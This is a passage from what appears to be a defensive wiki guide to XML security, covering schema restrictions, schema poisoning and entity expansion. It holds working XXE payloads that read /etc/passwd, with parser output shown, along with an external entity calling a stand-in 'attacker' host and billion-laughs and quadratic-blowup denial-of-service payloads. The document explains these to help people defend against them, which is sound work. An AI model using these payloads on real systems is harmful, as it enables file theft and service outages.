  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;&amp;lt;nowiki&amp;gt;http://www.w3.org/2001/XMLSchema&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;&amp;lt;nowiki&amp;gt;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;lt;/nowiki&amp;gt;&amp;quot; XMLNS:EXT=&amp;quot;&amp;lt;nowiki&amp;gt;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''&amp;lt;nowiki&amp;gt;http://attacker/huge.xml&amp;lt;/nowiki&amp;gt;'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy .&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address 1.1.1.1&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker (2.2.2.2):&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address '''2.2.2.2'''&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Sample Vulnerable Java Implementations === &lt;br /&gt;
Using the DTD capabilities of referencing local or remote files it is possible to affect the confidentiality. In addition, it is also possible to affect the availability of the resources if no proper restrictions have been set for the entities expansion. Consider the following example code of an XXE.&lt;br /&gt;
&lt;br /&gt;
'''Sample XML'''&lt;br /&gt;
 &amp;lt;!DOCTYPE contacts SYSTEM &amp;quot;contacts.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;contacts&amp;gt;&lt;br /&gt;
  &amp;lt;contact&amp;gt;&lt;br /&gt;
   &amp;lt;firstname&amp;gt;John&amp;lt;/firstname&amp;gt; &lt;br /&gt;
   &amp;lt;lastname&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/lastname&amp;gt;&lt;br /&gt;
  &amp;lt;/contact&amp;gt; &lt;br /&gt;
 &amp;lt;/contacts&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Sample DTD'''&lt;br /&gt;
 &amp;lt;!ELEMENT contacts (contact*)&amp;gt;&lt;br /&gt;
 &amp;lt;!ELEMENT contact (firstname,lastname)&amp;gt;&lt;br /&gt;
 &amp;lt;!ELEMENT firstname (#PCDATA)&amp;gt;&lt;br /&gt;
 &amp;lt;!ELEMENT lastname ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY xxe SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== XXE using DOM ====&lt;br /&gt;
 import java.io.IOException;&lt;br /&gt;
 import javax.xml.parsers.DocumentBuilder;&lt;br /&gt;
 import javax.xml.parsers.DocumentBuilderFactory;&lt;br /&gt;
 import javax.xml.parsers.ParserConfigurationException;&lt;br /&gt;
 import org.xml.sax.InputSource;&lt;br /&gt;
 import org.w3c.dom.Document;&lt;br /&gt;
 import org.w3c.dom.Element;&lt;br /&gt;
 import org.w3c.dom.Node;&lt;br /&gt;
 import org.w3c.dom.NodeList;&lt;br /&gt;
&lt;br /&gt;
 public class parseDocument {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   try {&lt;br /&gt;
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();&lt;br /&gt;
    DocumentBuilder builder = factory.newDocumentBuilder();&lt;br /&gt;
    Document doc = builder.parse(new InputSource(&amp;quot;contacts.xml&amp;quot;));&lt;br /&gt;
    NodeList nodeLst = doc.getElementsByTagName(&amp;quot;contact&amp;quot;);&lt;br /&gt;
    for (int s = 0; s &amp;lt; nodeLst.getLength(); s++) {&lt;br /&gt;
      Node fstNode = nodeLst.item(s);&lt;br /&gt;
      if (fstNode.getNodeType() == Node.ELEMENT_NODE) {&lt;br /&gt;
        Element fstElmnt = (Element) fstNode;&lt;br /&gt;
        NodeList fstNmElmntLst = fstElmnt.getElementsByTagName(&amp;quot;firstname&amp;quot;);&lt;br /&gt;
        Element fstNmElmnt = (Element) fstNmElmntLst.item(0);&lt;br /&gt;
        NodeList fstNm = fstNmElmnt.getChildNodes();&lt;br /&gt;
        System.out.println(&amp;quot;First Name: &amp;quot;  + ((Node) fstNm.item(0)).getNodeValue());&lt;br /&gt;
        NodeList lstNmElmntLst = fstElmnt.getElementsByTagName(&amp;quot;lastname&amp;quot;);&lt;br /&gt;
        Element lstNmElmnt = (Element) lstNmElmntLst.item(0);&lt;br /&gt;
        NodeList lstNm = lstNmElmnt.getChildNodes();&lt;br /&gt;
        System.out.println(&amp;quot;Last Name: &amp;quot; + ((Node) lstNm.item(0)).getNodeValue());&lt;br /&gt;
      }&lt;br /&gt;
     }&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
     e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ javac parseDocument.java ; java parseDocument&lt;br /&gt;
 First Name: John&lt;br /&gt;
 Last Name: '''### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
==== XXE using DOM4J ====&lt;br /&gt;
 import org.dom4j.Document;&lt;br /&gt;
 import org.dom4j.DocumentException;&lt;br /&gt;
 import org.dom4j.io.SAXReader;&lt;br /&gt;
 import org.dom4j.io.OutputFormat;&lt;br /&gt;
 import org.dom4j.io.XMLWriter;&lt;br /&gt;
&lt;br /&gt;
 public class test1 {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   Document document = null;&lt;br /&gt;
   try {&lt;br /&gt;
    SAXReader reader = new SAXReader();&lt;br /&gt;
    document = reader.read(&amp;quot;contacts.xml&amp;quot;);&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   } &lt;br /&gt;
   OutputFormat format = OutputFormat.createPrettyPrint();&lt;br /&gt;
   try {&lt;br /&gt;
    XMLWriter writer = new XMLWriter( System.out, format );&lt;br /&gt;
    writer.write( document );&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ java test1&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE contacts SYSTEM &amp;quot;contacts.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;contacts&amp;gt;&lt;br /&gt;
  &amp;lt;contact&amp;gt;&lt;br /&gt;
   &amp;lt;firstname&amp;gt;John&amp;lt;/firstname&amp;gt;&lt;br /&gt;
   &amp;lt;lastname&amp;gt;'''### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
==== XXE using SAX ====&lt;br /&gt;
 import java.io.IOException;&lt;br /&gt;
 import javax.xml.parsers.SAXParser;&lt;br /&gt;
 import javax.xml.parsers.SAXParserFactory;&lt;br /&gt;
 import org.xml.sax.SAXException;&lt;br /&gt;
 import org.xml.sax.helpers.DefaultHandler;&lt;br /&gt;
&lt;br /&gt;
 public class parseDocument extends DefaultHandler {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   new parseDocument();&lt;br /&gt;
  }&lt;br /&gt;
  public parseDocument() {&lt;br /&gt;
   try {&lt;br /&gt;
    SAXParserFactory factory = SAXParserFactory.newInstance();&lt;br /&gt;
    SAXParser parser = factory.newSAXParser();&lt;br /&gt;
    parser.parse(&amp;quot;contacts.xml&amp;quot;, this);&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
  @Override&lt;br /&gt;
  public void characters(char[] ac, int i, int j) throws SAXException {&lt;br /&gt;
   String tmpValue = new String(ac, i, j);&lt;br /&gt;
   System.out.println(tmpValue);&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ java parseDocument&lt;br /&gt;
 John&lt;br /&gt;
 '''### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
==== XXE using StAX ====&lt;br /&gt;
 import javax.xml.parsers.SAXParserFactory;&lt;br /&gt;
 import javax.xml.stream.XMLStreamReader;&lt;br /&gt;
 import javax.xml.stream.XMLInputFactory;&lt;br /&gt;
 import java.io.File;&lt;br /&gt;
 import java.io.FileReader;&lt;br /&gt;
 import java.io.FileInputStream;&lt;br /&gt;
&lt;br /&gt;
 public class parseDocument {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   try {&lt;br /&gt;
    XMLInputFactory xmlif = XMLInputFactory.newInstance();&lt;br /&gt;
    FileReader fr = new FileReader(&amp;quot;contacts.xml&amp;quot;);&lt;br /&gt;
    File file = new File(&amp;quot;contacts.xml&amp;quot;);&lt;br /&gt;
    XMLStreamReader xmlfer = xmlif.createXMLStreamReader(&amp;quot;contacts.xml&amp;quot;, new FileInputStream(file));&lt;br /&gt;
    int eventType = xmlfer.getEventType();&lt;br /&gt;
    while (xmlfer.hasNext()) {&lt;br /&gt;
     eventType = xmlfer.next(); &lt;br /&gt;
     if(xmlfer.hasText()){&lt;br /&gt;
      System.out.print(xmlfer.getText());&lt;br /&gt;
     }&lt;br /&gt;
    }&lt;br /&gt;
    fr.close();&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ java parseDocument&lt;br /&gt;
 &amp;lt;!DOCTYPE contacts SYSTEM &amp;quot;contacts.dtd&amp;quot;&amp;gt;'''John### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;A&amp;gt;'''&amp;amp;A;'''&amp;lt;/A&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
